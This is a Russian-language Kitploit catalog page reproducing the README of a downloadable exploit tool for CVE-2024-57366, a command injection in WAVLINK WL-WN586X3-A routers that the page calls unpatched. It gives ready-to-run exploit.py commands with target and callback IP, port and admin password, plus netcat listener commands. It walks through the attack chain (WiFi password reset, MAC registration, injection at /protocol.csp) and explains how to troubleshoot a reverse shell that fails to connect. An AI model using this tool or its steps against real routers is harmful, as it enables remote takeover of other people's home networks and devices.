Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-57366 — Productized exploit for CVE-2024-57366 on WAVLINK WL-WN586X3-A routers (UNPATCHED AS OF THIS RELEASE!) | Kitploit
Инструменты/GitHubGitHub/h4ckusaur/cve-2024-57366
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

Productized exploit for CVE-2024-57366 on WAVLINK WL-WN586X3-A routers (UNPATCHED AS OF THIS RELEASE!)

11 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2024-57366 Exploit

Надёжный эксплойт для CVE-2024-57366, позволяющий удалённо выполнять код на уязвимых маршрутизаторах через обход проверки MAC-адреса и внедрение команд.

Это эксплойт после авторизации, требующий включённой функции «Удалённое управление» на маршрутизаторе и пароля администратора. Имя пользователя администратора жёстко задано как «admin».

🚀 Возможности

  • Автоматическая регистрация MAC-адреса — подключается к WiFi для регистрации MAC-адреса на маршрутизаторе
  • Сохранение сети во время эксплойта — поддерживает существующие сетевые подключения в процессе эксплуатации
  • Кэширование MAC-адресов — быстрые повторные эксплойты с использованием кэшированных успешных MAC-адресов
  • Совместимость с BurpSuite — точное соответствие формату запросов для максимальной надёжности
  • Обработка таймаутов — полезные сообщения при ожидании обратного соединения
  • Удобство использования — простой текстовый кэш MAC-адресов для лёгкого управления

📋 Требования

  • Python 3.6+
  • Система Linux с беспроводным адаптером
  • Доступ sudo (требуется для управления сетевыми интерфейсами)
  • Целевой маршрутизатор, уязвимый к CVE-2024-57366

🛠️ Установка

  1. Склонируйте или загрузите файлы эксплойта
  2. Убедитесь, что у вас есть необходимые пакеты Python:
    root@kitploit:~
    pip3 install requests
    

🎯 Использование

Базовый эксплойт (первый раз)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

Быстрый эксплойт (с использованием кэшированного MAC)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Скрипт спросит: "Use cached MAC for quick exploit? (y/n):" — ответьте "y"

Принудительный полный эксплойт (пропустить кэш)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

Список кэшированных MAC-адресов

root@kitploit:~
python3 exploit.py --list-cached

📖 Параметры командной строки

  • --target — IP-адрес целевого маршрутизатора (по умолчанию: 127.0.0.1)
  • --port — Порт целевого маршрутизатора (по умолчанию: 80)
  • --local-ip — Ваш локальный IP-адрес для обратного вызова reverse shell
  • --local-port — Локальный порт для обратного вызова reverse shell (по умолчанию: 4444)
  • --password — Пароль администратора маршрутизатора
  • --ssid — Имя сети WiFi (по умолчанию: WAVLINK-Mesh_DC4B)
  • --force-full — Принудительно выполнить полный эксплойт, пропуская проверку кэшированного MAC
  • --list-cached — Показать список кэшированных MAC-адресов и выйти

🔧 Как это работает

Технический обзор

CVE-2024-57366 эксплуатирует обход проверки MAC-адреса в прошивке маршрутизатора. Уязвимость позволяет внедрять команды через параметр mac в конечной точке /protocol.csp.

Процесс эксплойта

  1. Аутентификация — извлекает токен аутентификации с маршрутизатора
  2. Сброс пароля WiFi — сбрасывает пароль WiFi маршрутизатора на пароль администратора
  3. Регистрация MAC — подключается к WiFi для регистрации MAC-адреса на маршрутизаторе
  4. Внедрение команды — внедряет полезную нагрузку reverse shell с использованием зарегистрированного MAC
  5. Сохранение сети — поддерживает существующие сетевые подключения на протяжении всего процесса

Ключевые технические детали

  • Обход проверки MAC: Маршрутизатор проверяет MAC-адреса, определяя, подключались ли они к WiFi
  • Привязка сетевого интерфейса: Использует интерфейс eth0 для сохранения исходного сетевого контекста
  • Формат запроса: Точное соответствие формату BurpSuite (index=1, токен в пути URL)
  • Полезная нагрузка: Netcat reverse shell с именованным каналом для надёжности

Кэширование MAC-адресов

Эксплойт автоматически кэширует успешные MAC-адреса в файл successful_macs.txt:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

Ручное добавление MAC: Отредактируйте successful_macs.txt и добавьте строки вида:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 Пример использования

Первая попытка эксплойта

root@kitploit:~
# Запустите слушатель netcat
nc -lvp 4444

# Запустите эксплойт
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# Когда появится запрос на сохранение MAC-адреса, ответьте "y"

Последующие эксплойты (гораздо быстрее)

root@kitploit:~
# Запустите слушатель netcat
nc -lvp 4444

# Запустите эксплойт (будет использован кэшированный MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Ответьте "y", когда спросят об использовании кэшированного MAC

🔍 Устранение неполадок

Часто встречающиеся проблемы

  1. «No wireless adapters found»

    • Убедитесь, что беспроводной адаптер включён
    • Проверьте, что WiFi включён
    • Попробуйте запустить с sudo
  2. «MAC address validation failed»

    • MAC-адрес должен быть зарегистрирован на маршрутизаторе
    • Убедитесь, что этап подключения к WiFi выполнен успешно
    • Попробуйте сначала подключиться к WiFi вручную
  3. «Request timed out»

    • Это может означать, что эксплойт сработал!
    • Проверьте ваш слушатель netcat на наличие соединения reverse shell
    • Маршрутизатор может выполнять команду, но не отвечать по HTTP
  4. «Reverse shell not connecting»

    • Проверьте правильность --local-ip (используйте ip addr show eth0)
    • Убедитесь, что брандмауэр не блокирует соединение
    • Проверьте, что слушатель netcat запущен на правильном порту

Сетевые требования

  • Интерфейс eth0: Должен иметь IP-адрес для сохранения сети
  • Беспроводной адаптер: Требуется для начальной регистрации MAC
  • Доступ к маршрутизатору: Должна быть возможность достичь маршрутизатора через интерфейс eth0

📁 Структура файлов

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Основной скрипт эксплойта
├── successful_macs.txt     # Кэш MAC-адресов (автоматически создаваемый)
└── README.md              # Этот файл

⚠️ Отказ от ответственности

Этот инструмент предназначен только для образовательного и авторизованного тестирования. Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение. Авторы не несут ответственности за любое неправомерное использование этого инструмента.

🔗 Ссылки

  • CVE-2024-57366
  • Уязвимость прошивки маршрутизатора в проверке MAC-адреса
  • Внедрение команд через конечную точку /protocol.csp

📝 Лицензия

Этот проект предоставляется «как есть» в образовательных целях. Используйте ответственно и в соответствии с действующим законодательством.

Скачать инструмент